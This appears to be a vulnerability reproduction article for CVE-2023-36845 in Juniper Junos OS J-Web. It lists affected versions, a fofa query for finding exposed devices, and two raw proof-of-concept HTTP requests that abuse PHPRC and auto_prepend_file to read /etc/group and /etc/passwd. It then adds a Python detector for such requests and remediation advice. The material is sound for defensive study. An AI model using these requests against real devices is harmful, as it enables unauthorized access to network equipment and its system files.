Juniper Networks Junos OS EX remote command execution vulnerability [CVE-2023-36845]
Disclaimer: Please do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses caused by the dissemination or use of the information or tools provided in this article are the sole responsibility of the user, and have nothing to do with the author of the article. This article is for educational purposes only.
1. Vulnerability description
Juniper Networks Junos OS EX is a network operating system developed by the American company Juniper Networks for its own hardware. It contains a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches: an attacker can set PHP environment variables through the J-Web interface and achieve remote command execution without authentication.
2. Affected versions
All versions < 21.4R3-S5
22.1 versions < 22.1R3-S4
22.2 versions < 22.2R3-S2
22.3 versions < 22.3R2-S2, 22.3R3-S1
22.4 versions < 22.4R2-S1, 22.4R3
23.2 versions < 23.2R1-S1, 23.2R2
3. Cyberspace mapping query
fofa: title="Juniper Web Device Manager"
4. Vulnerability reproduction
1. Manual reproduction
Reproduction POC 1
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

auto_prepend_file="/etc/group"
[Burp Suite screenshot]
Reproduction POC 2
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

auto_prepend_file="/etc/passwd"
[Burp Suite screenshot]
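As an added defender-side example (not code from the original article), the following Python flags captured HTTP requests that carry the two markers of the technique shown above: a PHPRC parameter in the query string and a php.ini directive such as auto_prepend_file in the request body. The sample requests are constructed; the case-insensitive parameter match and the extra auto_append_file directive are assumptions of this example, not something the article states.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# php.ini directives to look for at the start of a body line. auto_prepend_file
# is the one used in the requests above; auto_append_file is an assumed extra.
SUSPECT_DIRECTIVES = ("auto_prepend_file", "auto_append_file")
DIRECTIVE_RE = re.compile(r"^\s*(%s)\s*=" % "|".join(SUSPECT_DIRECTIVES), re.I | re.M)

def query_sets_phprc(target):
    """True if any query parameter is named PHPRC. parse_qsl percent-decodes
    names, so an encoded %50HPRC is caught too. Case-insensitive match is an assumption."""
    query = urlsplit(target).query
    return any(name.upper() == "PHPRC" for name, _ in parse_qsl(query, keep_blank_values=True))

def body_ini_directives(body):
    """Sorted names of suspect php.ini directives found in the request body."""
    return sorted({m.group(1).lower() for m in DIRECTIVE_RE.finditer(body or "")})

def classify_request(req):
    """Return the reasons a captured request matches the technique; empty if clean."""
    reasons = []
    if query_sets_phprc(req["target"]):
        reasons.append("PHPRC set via query string")
    directives = body_ini_directives(req.get("body"))
    if directives:
        reasons.append("php.ini directive in body: " + ",".join(directives))
    return reasons

def scan(requests):
    """(source, target, reasons) for every request that matches at least one marker."""
    hits = []
    for req in requests:
        reasons = classify_request(req)
        if reasons:
            hits.append((req["src"], req["target"], reasons))
    return hits

# Constructed sample of captured requests (RFC 5737 documentation addresses).
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "target": "/?PHPRC=/dev/fd/0",
     "body": 'auto_prepend_file="/etc/passwd"\n'},
    {"src": "198.51.100.2", "method": "POST", "target": "/?%50HPRC=%2Fdev%2Ffd%2F0",
     "body": "auto_prepend_file=/etc/group"},
    {"src": "192.0.2.9", "method": "GET", "target": "/?PHPRC_DOC=1", "body": ""},
    {"src": "192.0.2.10", "method": "POST", "target": "/login", "body": "user=admin&pass=x"},
]

if __name__ == "__main__":
    for src, target, reasons in scan(SAMPLE_REQUESTS):
        print(f"{src} {target}: {'; '.join(reasons)}")
```

Only the first two constructed requests are reported; the lookalike PHPRC_DOC parameter and the ordinary login POST are left alone.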
2. Automated reproduction
Xiaolong POC detection tool
7. Remediation suggestions
Upgrade to a fixed version
Block sensitive code execution